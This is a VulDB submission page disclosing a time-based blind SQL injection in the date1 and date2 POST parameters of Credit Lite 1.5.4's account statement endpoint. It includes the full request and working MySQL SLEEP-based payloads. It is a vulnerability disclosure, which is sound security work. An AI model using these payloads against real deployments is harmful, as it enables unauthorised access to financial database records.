Submit #189241: Credit Lite 1.5.4 - SQL Injectioninfo

TitelCredit Lite 1.5.4 - SQL Injection
Beschreibung# Exploit Title: Credit Lite 1.5.4 - SQL Injection # Exploit Author: skalvin aka (CraCkEr) # Date: 31/07/2023 # Vendor: Hobby-Tech # Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392 # Software Link: https://credit-lite.appshat.xyz/ # Tested on: Windows 10 Pro # Impact: Database Access ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. ## Steps to Reproduce: To Catch the POST Request 1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement 2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter] Path: /portal/reports/account_statement POST parameter 'date1' is vulnerable to SQL Injection POST parameter 'date2' is vulnerable to SQL Injection ------------------------------------------------------------------------- POST /portal/reports/account_statement HTTP/2 _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001 ------------------------------------------------------------------------- --- Parameter: date1 (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001 Parameter: date2 (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001 --- [-] Done
Benutzer
 skalvin (UID 49463)
Einreichung31.07.2023 20:07 (vor 3 Jahren)
Moderieren18.08.2023 09:58 (18 days later)
StatusAkzeptiert
VulDB Eintrag237511 [Codecanyon Credit Lite 1.5.4 POST Request account_statement date1/date2 SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!